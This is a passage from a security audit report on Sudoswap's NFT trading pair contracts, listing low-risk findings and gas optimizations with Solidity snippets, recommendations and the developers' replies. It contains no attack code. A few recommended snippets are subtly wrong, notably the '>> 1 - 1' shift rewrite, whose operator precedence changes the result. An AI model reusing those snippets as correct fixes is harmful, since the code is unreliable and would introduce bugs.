_calculateRoyalties() which allows their royalties to be equal to sale amount. Sudorandom Labs: This PR aims to centralize all the input vs royalty amount checking in LSSVMPair rather than the RoyaltyEngine. We need to check that Settings don't override the royalty percentage to be too high anyway, which is already check in _calculateRoyalties, so the decision is to remove the total amount checking in the RoyaltyEngine and instead centralize the check in the Pair itself. Spearbit: Verified that this is fixed by PR#60 and PR#78. 23 +5.3.5 Numerical difference between getNFTQuoteForBuyOrderWithPartialFill() and _findMaxFill- ableAmtForBuy() may lead to precision errors Severity: Low Risk Context: VeryFastRouter.sol#L56-L95, VeryFastRouter.sol#L228-L266 Description: There is a slight numerical instability between the partial fill calculation and the first client side cal- culation (i.e. getNFTQuoteForSellOrderWithPartialFill() / getNFTQuoteForBuyOrderWithPartialFill(), _- findMaxFillableAmtForBuy() ). This is because getNFTQuoteForSellOrderWithPartialFill() first assumes a buy of 1 item, updates spotPrice/delta, and then gets the next subsequent quote to buy the next item. Whereas _findMaxFillableAmtForBuy() assumes buying multiple items at one time. This can for e.g. Exponential- Curve.sol and XykCurve.sol lead to minor numerical precision errors. function getNFTQuoteForBuyOrderWithPartialFill(LSSVMPair pair, uint256 numNFTs) external view returns ,! (uint256[] memory) { ... for (uint256 i; i < numNFTs; i++) { ... (, spotPrice, delta, price,,) = pair.bondingCurve().getBuyInfo(spotPrice, delta, 1, fee, ...); ... } } function getNFTQuoteForSellOrderWithPartialFill(LSSVMPair pair, uint256 numNFTs) external view returns ,! (uint256[] memory) { ... for (uint256 i; i < numNFTs; i++) { ... (, spotPrice, delta, price,,) = pair.bondingCurve().getSellInfo(spotPrice, delta, 1, fee, ... ); ... } ... } function _findMaxFillableAmtForBuy(LSSVMPair pair, uint256 maxNumNFTs, uint256[] memory ,! maxCostPerNumNFTs, uint256 ... while (start <= end) { ... (...) = pair.bondingCurve().getBuyInfo(spotPrice, delta, (start + end)/2, feeMultiplier, ,! protocolFeeMultiplier); ... } } Recommendation: This has been solved after the review started in PR#27. getNFTQuoteForSellOrderWithPar- tialFill() now accepts an optional slippage parameter which scales up the buy quotes by that amount. As long as the slippage amount is kept to a minimum amount (e.g. 0.00000001%), this should be acceptable. Sudorandom Labs: Solved in PR#27. Spearbit: Verified that this is fixed by PR#27. 24 +5.3.6 Differences with Manifold version of RoyaltyEngine may cause unexpected behavior Severity: Low Risk Context: RoyaltyEngine.sol#L132-L159, RoyaltyEngine.sol#L94-L108 RoyaltyEngineV1.sol#L170-L189, Manifold Manifold RoyaltyEngineV1.sol#L91-L109, Description: Sudoswap has forked RoyaltyEngine from Manifold; however there are some differences. The Manifold version of _getRoyaltyAndSpec() also queries getRecipients(), while the Sudoswap version doesn't. This means the Sudoswap will not spread the royalties over all recipients. function _getRoyaltyAndSpec(...) // Manifold ,! ,! ... try IEIP2981(royaltyAddress).royaltyInfo(tokenId, value) returns (address recipient, uint256 amount) { ... try IRoyaltySplitter(royaltyAddress).getRecipients() returns (Recipient[] memory splitRecipients) { ... } } } function _getRoyaltyAndSpec(...) // Sudoswap ... try IEIP2981(royaltyAddress).royaltyInfo(tokenId, value) returns (address recipient, uint256 ,! amount) { ... } ... } } The Manifold version of getRoyalty() has an extra try/catch compared to the Sudoswap version. This protects against reverts in the cached functions. Note: adding an extra try/catch requires the function _getRoyaltyAnd- Spec() to be external. function getRoyalty(address tokenAddress, uint256 tokenId, uint256 value) ... { // Manifold ... try this._getRoyaltyAndSpec{gas: 100000}(tokenAddress, tokenId, value) returns ( ... ) .... } function getRoyalty(address tokenAddress, uint256 tokenId, uint256 value) ... { // Sudoswap ... ... (...) = _getRoyaltyAndSpec(tokenAddress, tokenId, value); } Recommendation: Check the latest version of Manifold code to determine if anything needs updating. Sudorandom Labs: Acknowledged, we don't feel strongly about the added code so we'll leave ours as is. Spearbit: Acknowledged. 25 +5.3.7 Swaps with property-checked ERC1155 sell orders in VeryFastRouter will fail Severity: Low Risk Context: VeryFastRouter.sol#L120, VeryFastRouter.sol#L134 Description: Any swap batch of transactions which has a property-checked sell order for ERC1155 will revert. Given that property checks are not supported on ERC1155 pairs (but only ERC721), swap sell orders for ERC1155 in VeryFastRouter will fail if order.doPropertyCheck is accidentally set because the logic thereafter assumes it is an ERC721 order. Recommendation: Check if the order pair is ERC721 before checking property or allow users to explicitly specify in an order if it is ERC721 or ERC1155 specific. Sudorandom Labs: No change for now. Callers using the router should set the appropriate parameters for the asset type of the swap. The downside is bounded as a revert (rather than e.g. callers losing their funds) which is an acceptable risk. Spearbit: Acknowledged. +5.3.8 changeSpotPriceAndDelta() reverts when there is enough liquidity to support 1 sell Severity: Low Risk Context: StandardSettings.sol.sol#L287 Description: changeSpotPriceAndDelta() reverts when there is enough liquidity to support 1 sell because it uses > instead of >= in the check pairBalance > newPriceToSellToPair. Recommendation: Use >= instead of >: // If the new sell price is higher, and there is enough liquidity to support at least 1 sell, then make ,! - + the change if ((newPriceToSellToPair > priceToSellToPair) && pairBalance > newPriceToSellToPair) { if ((newPriceToSellToPair > priceToSellToPair) && pairBalance >= newPriceToSellToPair) { Sudorandom Labs: Solved in PR#56. Spearbit: Verified that this is fixed by PR#56. +5.3.9 Lack of support for per-token royalties may lead to incorrect royalty payments Severity: Low Risk Context: LSSVMPair.sol#L259, LSSVMPairERC721.sol#L52 Description: The protocol currently lacks complete support for per-token royalties, assumes that all NFTs in a pair have the same royalty and so considers the first assetId to determine royalties for all NFT token Ids in the pair. If not, the pair owner is expected to make a new pair for NFTs that have different royalties. A pair with NFTs that have different royalties will lead to incorrect royalty payments for the different NFTs. Recommendation: Evaluate adding complete support for per-token royalties. Sudorandom Labs: This is a design decision to balance trade-off between gas and utility. If different NFT IDs have different royalty amounts / receivers (e.g. Artblocks), the intent is for pool owners to separate them into different pools. Spearbit: Acknowledged. 26 +5.3.10 Missing additional safety for multicall may lead to lost ETH in future Severity: Low Risk Context: LSSVMPair.sol#L653-L663 Description: If the function multicall() would be payable, then multiple delegated-to functions could use the same msg.value , which could result in losing ETH from the pair. A future upgrade of Solidity might change the default setting for function to payable. See Solidity issue#12539. function multicall(bytes[] calldata calls, bool revertOnFail) external onlyOwner { for (uint256 i; i < calls.length;) { (bool success, bytes memory result) = address(this).delegatecall(calls[i]); ... } } Recommendation: Consider adding a check for msg.value to be future proof and extra safe. Alternatively make a comment about the risk. function multicall(bytes[] calldata calls, bool revertOnFail) external onlyOwner { require(msg.value == 0); for (uint256 i; i < calls.length;) { (bool success, bytes memory result) = address(this).delegatecall(calls[i]); ... } } Sudorandom Labs: Acknowledged, no change for now as solidity has not made functions payable by default. Spearbit: Acknowledged. +5.3.11 Missing zero-address check may allow re-initialization of pairs Severity: Low Risk Context: LSSVMPair.sol#L118-L126 LSSVMPair. initialize() checks if is already initialized using require(owner() == Description: address(0), "Initialized");. However, without a zero-address check on _owner, this can be true even later if the pair is initialized accidentally with address(0) instead of msg.sender. This is because __Ownable_init in OwnableWithTransferCallback does not disallow address(0) unlike transferOwnership. This is however not the case with the current implementation where LSSVMPair.initialize() is called from LSSVMPairFactory with msg.sender as argument for _owner. it Therefore, LSSVMPair.initialize() may be called multiple times. Recommendation: Add a zero-address check on _owner parameter of initialize(). Sudorandom Labs: Acknowledged, no change as at the moment, we pass in caller to be the owner of pairs. Spearbit: Acknowledged. 27 +5.3.12 Trade pair owners are allowed to change asset recipient address when it has no impact Severity: Low Risk Context: LSSVMPair.sol#L627-L632, LSSVMPair.sol#L310-L328 Description: Trade pair owners are allowed to change their asset recipient address using changeAssetRecipi- ent() while getAssetRecipient() always returns the pair address itself for Trade pairs as expected. Trade pair owners mistakenly assume that they can change their asset recipient address using changeAssetRe- cipient() because they are allowed to do so successfully, but may be surprised to see that it has no effect. They may expect assets at the new address but that will not be the case. Recommendation: changeAssetRecipient() could exclude PoolType.TRADE owners from being allowed to change the asset recipient. Sudorandom Labs: It's intended to let this value be changed for TRADE pools. To avoid an extra storage slot, getFeeRecipient reads from this value for TRADE pools. Spearbit: Acknowledged. +5.3.13 NFT projects with custom settings and multiple royalty receivers will receive royalty only for first receiver Severity: Low Risk Context: LSSVMPair.sol#L489-L503, LSSVMPair.sol#L523-L538 Description: _calculateRoyalties() and its view equivalent only consider the first royalty receiver when custom settings are enabled. If non-ERC-2981 compliant NFT projects on Manifold/ArtBlocks or other platforms that support multiple royalty receivers come up with custom settings that pair owners subscribe to, then all the royalty will go to the first recipient. Other receivers will not receive any royalties. Recommendation: Evaluate splitting of enhanced setting royalties evenly/proportionally across all receivers. Sudorandom Labs: To give you more context on this logic, most NFT projects only have a single royalty receiver as they follow the ERC2981 standard. However, Manifold and ArtBlocks will sometimes have multiple receivers. In these cases, we choose to use the first receiver for simplicity's sake if the pair has custom settings. It is unlikely that a project creator will both Manifold and also have custom settings. Acknowledged, no change as this is only relevant for a small subset of collections, and is an acceptable risk. Spearbit: Acknowledged. +5.3.14 Missing non-zero checks allow event emission spamming Severity: Low Risk Context: LSSVMPairFactory.sol#L650-L663, LSSVMPairFactory.sol#L668-L676 Description: Functions depositNFTs() and depositERC20() are meant to allow deposits into the pair post- creation. However, they do not check if non-zero NFTs or tokens are being deposited. The event emission only checks if the pair recipient is valid. Given their permissionless nature, this allows anyone to grief the system with zero NFT/token deposits causing emission of events which may hinder indexing/monitoring systems. Recommendation: Add non-zero checks for numNFTs and amount before event emission. Sudorandom Labs: Solved in PR#63. Spearbit: Verified that this is fixed by PR#63. 28 +5.3.15 Missing sanity zero-address checks may lead to undesired behavior or lock of funds Severity: Low Risk Context: StandardSettings.sol#L38-L42, StandardSettings.sol#L164-L206, LSSVMPairFactory.sol#L82-L98, VeryFastRouter.sol#L210, VeryFastRouter.sol#L48-L50, LSSVMPairFactory.sol#L393, LSSVMRouter.sol#L597, LSSVMPairETH.sol#L114, LSSVMPairETH.sol#L95, LSSVMPairETH.sol#L63 StandardSettings.sol#L132, LSSVMRouter.sol#L362, LSSVMRouter.sol#L232, Splitter.sol#L34, Description: Certain logic requires zero-address checks to avoid undesired behavior or lock of funds. For exam- ple, in Splitter.sol#L34 users can permanently lock ETH by mistakenly using safeTransferETH with default/zero- address value. Recommendation: Check if an address-type variable is address(0) and revert when true with an appropriate error message. In particular, see: • StandardSettings.sol#L38-L42: consider adding require(_settingsFeeRecipient != address(0)). • StandardSettings.sol#L164-L206: consider adding require(pairInfo.prevOwner != address(0)). • LSSVMPairFactory.sol#L82-L98: consider adding require(_protocolFeeRecipient != address(0)). • VeryFastRouter.sol#L48-L50: consider adding require(_factory != address(0)). • StandardSettings.sol#L132, LSSVMRouter.sol#L597, LSSVMRouter.sol#L362, LSSVMRouter.sol#L232, LSSVMPairFactory.sol#L393, LSSVMPairETH.sol#L114, LSSVMPairETH.sol#L95, LSSVMPairETH.sol#L63: consider adding a zero-address check on the caller of safeTransferETH. VeryFastRouter.sol#L210, Splitter.sol#L34, Sudorandom Labs: We're going to pass on this since the exploit scope is low impact. Spearbit: Acknowledged. +5.3.16 Legacy NFTs are not compatible with protocol pairs Severity: Low Risk Context: LSSVMPair.sol#L15 Description: Pairs support ERC721 and ERC1155 NFTs. However, users of NFT marketplaces may also expect to find OG NFTs such as Cryptopunks, Etherrocks or Cryptokitties, which do not adhere to these ERC standards. For example, Cryptopunks have their own internal marketplace which allows users to trade their NFTs with other users. Given that Cryptopunks does not adhere to the ERC721 standard, it will always fail when the protocol attempts to trade them. Even with wrapped versions of these NFTs, people who aren't aware or have the original version won't be able to trade them in a pair. Recommendation: Consider adding compatibility as it's a competitive feature. Typical way of supporting them is to add a flow for their addresses as shown here. for moon- Sudorandom Labs: Yes, this is a known incompatibility. There are various wrapped variants (e.g. cats/punks) which have support for ERC721. The design goal here is to adhere more towards the asset standards when possible. I am okay that certain legacy assets may be out of scope. Spearbit: Acknowledged. 29 +5.3.17 Unnecessary payable specifier for functions may allow ETH to be sent and locked/lost Severity: Low Risk Context: LSSVMRouter.sol#L410-L415, LSSVMPair.sol#L118-L124 and Description: LSSVMPair.initialize() which do not expect to receive and process Ether have the payable specifier which allows interacting users to accidentally send them Ether which will get locked/lost. LSSVMRouter.robustSwapERC20ForSpecificNFTsAndNFTsToToken() Functions Recommendation: Remove payable specifier on these functions which do not expect to receive and process Ether. Sudorandom Labs: Solved in PR#66. Spearbit: Verified that this is fixed by PR#66. +5.3.18 Obsolete Splitter contract may lead to locked ETH/tokens Severity: Low Risk Context: Splitter.sol#L31-L60, StandardSettings.sol#L89-L91, StandardSettings.sol#L164-L206 Description: After a pair has be reclaimed via reclaimPair(), pairInfos[] will be emptied and getPrevFeeRe- cipientForPair() will return 0. The obsolete Splitter will however remain present, but any ETH or tokens that are sent to the contract can't be completely retrieved via withdrawETH() and withdrawTokens(). This is because getPrevFeeRecipientForPair() is 0 and the tokens would be send to address(0). It is unlikely though that ETH or tokens are sent to the Splitter contract as it is not used anymore. function withdrawETH(uint256 ethAmount) public { ISettings parentSettings = ISettings(getParentSettings()); ... payable(parentSettings.getPrevFeeRecipientForPair(getPairAddressForSplitter())).safeTransferETH(... ); ,! } function withdrawTokens(ERC20 token, uint256 tokenAmount) public { ISettings parentSettings = ISettings(getParentSettings()); ... token.safeTransfer(parentSettings.getPrevFeeRecipientForPair(getPairAddressForSplitter()), ... ); c } function getPrevFeeRecipientForPair(address pairAddress) public view returns (address) { return pairInfos[pairAddress].prevFeeRecipient; } function reclaimPair(address pairAddress) public { ... delete pairInfos[pairAddress]; ... } Recommendation: Evaluate if it is worth the trouble to do anything with the obsolete Splitter contract. Sudorandom Labs: Acknowledged, no change for now. Spearbit: Acknowledged. 30 +5.3.19 Divisions in getBuyInfo() and getSellInfo() may be rounded down to 0 Severity: Low Risk Context: XykCurve.sol#L42-L134 Description: In extreme cases (e.g. tokens with a few decimals, see this example), divisions in getBuyInfo() and getSellInfo() may be rounded down to 0. This means inputValueWithoutFee and/or outputValueWithoutFee may be 0. function getBuyInfo(..., uint256 numItems, ... ) ... { ... uint256 inputValueWithoutFee = (numItems * tokenBalance) / (nftBalance - numItems); ... } function getSellInfo(..., uint256 numItems, ... ) ... { ... uint256 outputValueWithoutFee = (numItems * tokenBalance) / (nftBalance + numItems); ... } Recommendation: The rounding down could be ignored as it involves very low amounts of tokens. Alternatively round up, for example, in the following way: uint256 outputValueWithoutFee = (numItems * tokenBalance + (nftBalance - numItems - 1) ) / (nftBalance ,! - numItems); Sudorandom Labs: This is an acceptable risk when decimals and prices are both very low. Spearbit: Acknowledged. +5.3.20 Last NFT in an XykCurve cannot be sold Severity: Low Risk Context: XykCurve.sol#L42-L88, StandardSettings.sol#L227-L294, LSSVMPair.sol#L206-L219 Description: The function getBuyInfo() of XykCurve enforces numItems < nftBalance, which means the last NFT can never be sold. One potential solution as suggested by the Sudoswap team is to set delta (=nftBalance) one higher than the real amount of NFTs. This could cause problems in other parts of the code. For example, once only one NFT is left, if we try to use changeSpotPriceAndDelta(), getBuyNFTQuote(1) will error and thus the prices (tokenBalance) and delta (nftBalance) can't be changed anymore. If nftBalance is set to one higher, then it won't satisfy pair.nft().balanceOf(pairAddress) >= 1. 31 contract XykCurve ... { function getBuyInfo(..., uint256 numItems, ... ) ... { ... uint256 tokenBalance = spotPrice; uint256 nftBalance = delta; ... // If numItems is too large, we will get divide by zero error if (numItems >= nftBalance) { return (Error.INVALID_NUMITEMS, 0, 0, 0, 0, 0); } ... } } function changeSpotPriceAndDelta(...) ... { ... (,,, uint256 priceToBuyFromPair,) = pair.getBuyNFTQuote(1); ... if (... && pair.nft().balanceOf(pairAddress) >= 1) { pair.changeSpotPrice(newSpotPrice); pair.changeDelta(newDelta); return; } ... } function getBuyNFTQuote(uint256 numNFTs) ... { (error, ...) = bondingCurve().getBuyInfo(..., numNFTs, ...); } Recommendation: Evaluate what to do with the last NFT in a XykCurve. Perhaps it is unsolvable due to the nature of Xyk curves. Sudorandom Labs: Acknowledged, the last item is an open question for now. As long as pair creators understand the pricing dynamic, this is an acceptable risk. Spearbit: Acknowledged. +5.3.21 Allowing different ERC20 tokens in LSSVMRouter swaps will affect accounting and lead to unde- fined behavior Severity: Low Risk Context: LSSVMRouter.sol#L109-L135 Description: As commented "Note: All ERC20 swaps assume that a single ERC20 token is used for all the pairs involved. * Swapping using multiple tokens in the same transaction is possible, but the slippage checks * & the return values will be meaningless and may lead to undefined behavior." This assumption may be risky if users end up mistakenly using different ERC20 tokens in different swaps. Summing up their inputAmount and remainingValue will not be meaningful and lead to accounting errors and undefined behavior (as noted). Recommendation: Consider adding checks to enforce (instead of assuming/warning) that ERC20 tokens used in all the swap list pairs are the same. Sudorandom Labs: Acknowledged, VeryFastRouter is intended to be the full-featured router for interacting with v2 of the Pairs that has support for separate minOutput values for different tokens. Spearbit: Acknowledged. 32 +5.3.22 Missing array length equality checks may lead to incorrect or undefined behavior Severity: Low Risk Context: LSSVMPairERC721.sol#L292-L298, LSSVMPairERC1155.sol#L273-L301, StandardSettings.sol#L301- L313, RoyaltyEngine.sol#L78-L89, MerklePropertyChecker.sol#L18-L28 Description: Functions taking two array type parameters and not checking that their lengths are equal may lead to incorrect or undefined behavior when accidentally passing arrays of unequal lengths. Recommendation: Check if the lengths of the two array parameters are equal before use. Sudorandom Labs: Acknowledged, no change for the following: the LSSVMPair functions are owner operated, so if any mismatches arise, the owner can just call it again. For the RoyaltyEngine, the bulkCache call is also user initiated, so it can also be retried. Spearbit: Acknowledged. +5.3.23 Owners may have funds locked if newOwner is EOA in transferOwnership() Severity: Low Risk Context: OwnableWithTransferCallback.sol#L45 Description: In transferOwnership(), if newOwner has zero code.length (i.e. EOA), newOwner.isContract() will be false and therefore, if block will be ignored. As the function is payable, any msg.value from the call would get locked in the contract. Note: ERC20 pairs and StandardSettings don't have a method to recover ETH. Recommendation: Create an else block where msg.value is checked for not being 0. msg.value back to the msg.sender or revert. If it is not 0, transfer Sudorandom Labs: Acknowledged, no change for now. Certain owners may wish to both transfer ownership and send funds to the new recipient. Any issues with the recipient e.g. being unable to accept ETH are an acceptable risk. Spearbit: Acknowledged. +5.3.24 Use of transferFrom may lead to NFTs getting locked forever Severity: Low Risk Context: LSSVMPairERC721.sol#L199, LSSVMPairERC721.sol#L253 Description: ERC721 NFTs may get locked forever if the recipient is not aware of ERC721 for some reason. While safeTransferFrom() is used for ERC1155 NFTs (which has the _doSafeTransferAcceptanceCheck check on recipient and does not have an option to avoid this), transferFrom() is used for ERC721 NFTs presumably for gas savings and reentrancy concerns over its safeTransferFrom variant (which has the _checkOnERC721Received check on the recipient). Recommendation: Evaluate using ERC721 safeTransferFrom() to avoid NFTs getting stuck vis-a-vis its reen- trancy risk and gas costs. Sudorandom Labs: Acknowledged, this is an acceptable risk for us given the gas savings and reduced reentrancy surface. Spearbit: Acknowledged. 33 +5.3.25 Single-step ownership change introduces risks Severity: Low Risk Context: LSSVMPairFactory.sol#L39, OwnableWithTransferCallback.sol#L68-L71 Description: Single-step ownership transfers add the risk of setting an unwanted owner by accident (this includes address(0)) if the ownership transfer is not done with excessive care. The ownership control library Owned by Solmate implements a simple single-step ownership transfer without zero-address checks. Recommendation: Consider employing 2 step ownership transfer mechanisms for this critical ownership, such as Open Zeppelin's Ownable2Step or Synthetic's Owned. Sudorandom Labs: Acknowledged, risk is acceptable for us here as ownership is transferred to callers on factory call. As it is caller-initiated, risks of unintended owners being set are reduced. Spearbit: Acknowledged. +5.3.26 getAllPairsForSettings() may run out of gas Severity: Low Risk Context: LSSVMPairFactory.sol#L531-L541 Description: The function getAllPairsForSettings() has a loop over pairsForSettings. As the creation of pairs is permissionless, that array could get arbitrarily large. Once the array is large enough, the function will run out of gas. Note: the function is only called from the outside. function getAllPairsForSettings(address settings) external view returns (address[] memory) { uint256 numPairs = pairsForSettings[settings].length(); ... for (uint256 i; i < numPairs;) { ... unchecked { ++i; } } ... } Recommendation: Make sure alternative ways exist to retrieve this information in the (unlikely) case that function runs out of gas. Sudorandom Labs: This function is meant to be used externally only so we're not worried about that. Spearbit: Acknowledged. +5.3.27 Partially implemented SellOrderWithPartialFill functionality may cause unexpected behavior Severity: Low Risk Context: VeryFastRouter.sol#L276-L291, VeryFastRouter.sol#L78-L95 SellOrderWithPartialFill cannot be performed and sell orders will only be executed if Description: pair.spotPrice() == order.expectedSpotPrice in a swap. This may be confusing to users who expect partial fills in both directions but notice unexpected behavior if deployed as-is. While the BuyOrderWithPartialFill functionality is fully implemented, the corresponding SellOrderWithPartialFill feature is partially implemented with getNFTQuoteForSellOrderWithPartialFill, an incomplete _findMaxFillableAmtForSell (placeholder comment: "// TODO: implement") and other supporting logic required in swap(). Recommendation: Complete implementation of SellOrderWithPartialFill feature. Sudorandom Labs: Acknowledged, now addressed in this open PR#27. Spearbit: Verified that this is fixed by PR#27. 34 +5.3.28 Lack of deadline checks for certain swap functions allows greater exposure to volatile market prices Severity: Low Risk Context: LSSVMRouter.sol#L410-L415 LSSVMRouter.sol#L46-L49, LSSVMRouter.sol#L552-L554, LSSVMRouter.sol#L327-L332, Description: Many swap functions in LSSVMRouter use the checkDeadline modifier to prevent swaps from execut- ing beyond a certain user-specified deadline. This is presumably to reduce exposure to volatile market prices on top of the thresholds of maxCost for buys and minOutput for sells. However two router functions robustSwapETH- ForSpecificNFTsAndNFTsToToken and robustSwapERC20ForSpecificNFTsAndNFTsToToken in LSSVMRouter and all functions in VeryFastRouter are missing this modifier and the user parameter required for it. Users attempting to swap using these two swap functions do not have a way to specify a deadline for their execution unlike the other swap functions in this router. If the front-end does not highlight or warn about this, then the user swaps may get executed after a long time depending on the tip included in the transaction and the network congestion. This causes greater exposure for the swaps to volatile market prices. Recommendation: Add a deadline field to struct RobustPairNFTsFoTokenAndTokenforNFTsTrade and include that with the modifier checkDeadline similar to other swap functions. Consider adding the same feature for swap functions in VeryFastRouter. Sudorandom Labs: Acknowledged, no change. The intent is for users to use the minInput/maxOutput amounts (or e.g. update their nonce) to prevent against prices changes. Execution over a longer time frame (but within the specified price range) is an acceptable end result. Spearbit: Acknowledged. +5.3.29 Missing function to deposit ERC1155 NFTs after pair creation Severity: Low Risk Context: LSSVMPairFactory.sol#L650-L676 Description: Functions depositNFTs() and depositERC20() are apparently used to deposit ERC721 NFTs and ERC20s into appropriate pairs after their creation. According to the project team, this is used "for various UIs to consolidate approvals + emit a canonical event for deposits." However, an equivalent function for depositing ERC1155 NFTs is missing. This prevents ERC1155 NFTs from being deposited into pairs after creation for scenarios anticipated similar to ERC721 NFTs and ERC20 tokens. Recommendation: Add a depositNFTs() for ERC1155 NFTs. Sudorandom Labs: Solved in PR#65. Spearbit: Verified that this is fixed by PR#65. 35 5.4 Gas Optimization +5.4.1 Reading from state is more gas expensive than using msg.sender Severity: Gas Optimization Context: LSSVMPairETH.sol#L113-L123 Description: Solmate's Owned.sol contract implements the concept of ownership (by saving during contract con- struction the deployer in the owner state variable) and owner-exclusive functions via the onlyOwner() modifier. Therefore, within functions protected by the onlyOwner() modifier, the addresses stored in msg.sender and owner will be equal. So, if a function of said characteristics has to make use of the address of the owner, it is cheaper to use msg.sender than owner, because the latter reads from the contract state (using SLOAD opcode) while the former doesn't (address is directly retrieved via the cheaper CALLER opcode). Reading from state (SLOAD opcode which costs either 100 or 2100 gas units) costs more gas than using the msg.sender environmental variable (CALLER opcode which costs 2 units of gas). Note: withdrawERC20() already uses msg.sender function withdrawETH(uint256 amount) public onlyOwner { payable(owner()).safeTransferETH(amount); ... } function withdrawERC20(ERC20 a, uint256 amount) external override onlyOwner { a.safeTransfer(msg.sender, amount); } Recommendation: Consider replacing owner() by msg.sender to avoid reading from storage: function withdrawETH(uint256 amount) public onlyOwner { - + payable(owner()).safeTransferETH(amount); payable(msg.sender).safeTransferETH(amount); ... } Sudorandom Labs: Solved in PR#53. Spearbit: Verified that this is fixed by PR#53. +5.4.2 pair.factory().protocolFeeMultiplier() is read from storage on every iteration of the loop wast- ing gas Severity: Gas Optimization Context: VeryFastRouter.sol#L67, VeryFastRouter.sol#L93 Description: Not caching storage variables that are accessed multiple times within a loop causes waste of gas. If not cached, the solidity compiler will always read the value of protocolFeeMultiplier from storage during each iteration. For a storage variable, this implies extra SLOAD operations (100 additional gas for each iteration beyond the first). In contrast, for a memory variable, it implies extra MLOAD operations (3 additional gas for each iteration beyond the first). Recommendation: Consider caching pair.factory().protocolFeeMultiplier() to save gas. Sudorandom Labs: Acknowledged, these functions are intended to be used off chain. Spearbit: Acknowledged. 36 +5.4.3 The use of factory in ERC1155._takeNFTsFromSender() can be via a parameter rather than calling factory() again Severity: Gas Optimization Context: LSSVMPairERC1155.sol#L181, LSSVMPairERC721.sol#L179 Description: factory is being sent as a parameter to _takeNFTsFromSender in LSSVMPairERC721.sol#L179, which is saving gas because it is not required to read the value again. _takeNFTsFromSender(IERC721(nft()), nftIds, _factory, isRouter, routerCaller); However, in LSSVMPairERC1155.sol#L181, the similar function _takeNFTsFromSender() gets the value by calling factory() instead of using a parameter. _takeNFTsFromSender(IERC1155(nft()), numNFTs[0], isRouter, routerCaller); This creates an unnecessary asymmetry between the two contracts which are expected to be similar and also a possible gas optimization by avoiding a call to the factory getter. Recommendation: Add a _factory parameter to LSSVMPairERC1155.sol#L222. Sudorandom Labs: Solved in PR#51. Spearbit: Verified that this is fixed by PR#51. +5.4.4 Variables only set at construction time could be made immutable Severity: Gas Optimization Context: RoyaltyEngine.sol#L50 Description: immutable variables can be assigned either at construction time or at declaration time, and only once. The contract creation code generated by the compiler will modify the contract’s runtime code before it is returned by replacing all references to immutable variables by the values assigned to the them; so the compiler does not reserve a storage slot for these variables. Declaring variables only set at construction time as immutable results in saving one call per variable to SSTORE (0x55) opcode, thus saving gas during construction. Recommendation: royaltyRegistry could be declared as immutable because it is only set in the constructor, saving some gas in the process: - address public royaltyRegistry; + address public immutable royaltyRegistry; Sudorandom Labs: Solved in PR#56. Spearbit: Verified that this is fixed by PR#56. +5.4.5 Hoisting check out of loop will save gas Severity: Gas Optimization Context: VeryFastRouter.sol#L312-L320 Description: The check numIdsFound == maxIdsNeeded will never be true before the outer for loop finishes iterating over maxIdsNeeded because numIdsFound is conditionally incremented only by 1 in each iteration. Recommendation: Hoist the check and accompanying return idsThatExist; outside the for loop to save gas. Sudorandom Labs: Solved in PR#56. Spearbit: Verified that this is fixed by PR#56. 37 +5.4.6 Functionality of safeBatchTransferFrom() is not used Severity: Gas Optimization Context: LSSVMRouter.sol#L531-L543 Description: The function pairTransferERC1155From() allow that transfer of multiple id's of ERC1155 NFTs. The rest of the code only uses one id at a time. Using safeTransferFrom() instead of safeBatchTransferFrom(), might be better as it only accesses one id and uses less gas because no for loop is necessary. However future version of Sudoswap might support multiple ids. In that case its better to leave as is. function pairTransferERC1155From(..., uint256[] calldata ids, uint256[] calldata amounts,...) ... { ... nft.safeBatchTransferFrom(from, to, ids, amounts, bytes("")); } Recommendation: Consider using safeTransferFrom() instead of safeBatchTransferFrom(). Sudorandom Labs: No change for now. Spearbit: Acknowledged. +5.4.7 Using != 0 instead of > 0 can save gas Severity: Gas Optimization Context: LSSVMPairERC721.sol#L42, LSSVMPairERC721.sol#L149, LSSVMPairERC1155.sol#L52, LSSVM- PairERC1155.sol#L103, LSSVMPairERC1155.sol#L151, LSSVMPairERC20.sol#L109, LSSVMPairETH.sol#L48, LSSVMRouter.sol#L361, LSSVMPairETH.sol#L86, LSSVMPairFactory.sol#L588, LSSVMRouter2.sol#L83, LSSVMRouter.sol#L596, LSSVMRouter2.sol#L381, LSSVMRouter2.sol#L185, LSSVMRouter2.sol#L485, VeryFastRouter.sol#L146, VeryFastRouter.sol#L161, LSSVMRouter2.sol#L452, VeryFastRouter.sol#L170, VeryFastRouter.sol#L174, VeryFastRouter.sol#L201, VeryFastRouter.sol#L209. LSSVMRouter.sol#L231, Description: When dealing with unsigned integer types, comparisons with != 0 are 3 gas cheaper than > 0. Recommendation: Use != 0 instead of > 0 for comparison with unsigned integer types where appropriate. Sudorandom Labs: Addressed in PR#92. SSVMRouter changes not addressed because it is intended to be deprecated. Spearbit: Verified that this is fixed by PR#92. +5.4.8 Using >>1 instead of /2 can save gas Severity: Gas Optimization Context: LinearCurve.sol#L76, LinearCurve.sol#L144, LSSVMRouter2.sol#L246, LSSVMRouter2.sol#L280, VeryFastRouter.sol#L251, VeryFastRouter.sol#L256,VeryFastRouter.sol#L257, VeryFastRouter.sol#L261. Description: A division by 2 can be calculated by shifting one to the right (>>1). While the DIV opcode uses 5 gas, the SHR opcode only uses 3 gas. Recommendation: Consider using shift right for tiny gas optimization. - end = (start + end)/2 - 1; + end = (start + end) >> 1 - 1; Sudorandom Labs: Acknowledged, no change for now as we only use /2 sparingly, and the readability is pre- ferred. Spearbit: Acknowledged. 38 +5.4.9 Retrieval of ether balance of contract can be gas optimized Severity: Gas Optimization Context: Splitter.sol#L27 Description: The retrieval of the ether balance of a contract is typically done with address(this).balance. However, by using an assembly block and the selfbalance() instruction, one can get the balance with a discount of 15 units of gas. Recommendation: Consider using an assembly block to retrieve the internal balance. See below: - uint256 ethBalance = address(this).balance; + uint256 ethBalance; + assembly { + + ethBalance := selfbalance() } Sudorandom Labs: Acknowledged, no change for now. Spearbit: Acknowledged. +5.4.10 Function parameters should be validated at the very beginning for gas optimizations Severity: Gas Optimization Context: LSSVMPair.sol#L587, LSSVMPair.sol#L600, LSSVMPair.sol#L616 Description: Function parameters should be validated at the very beginning of the function to allow typical execu- tion paths and revert on the exceptional paths, which will lead to gas savings over validating later. Recommendation: Add the function parameter checks at the very beginning. For example function changeSpotPrice(uint128 newSpotPrice) external onlyOwner { + if (spotPrice != newSpotPrice) { ICurve _bondingCurve = bondingCurve(); require(_bondingCurve.validateSpotPrice(newSpotPrice), "Invalid new spot price for curve"); if (spotPrice != newSpotPrice) { spotPrice = newSpotPrice; emit 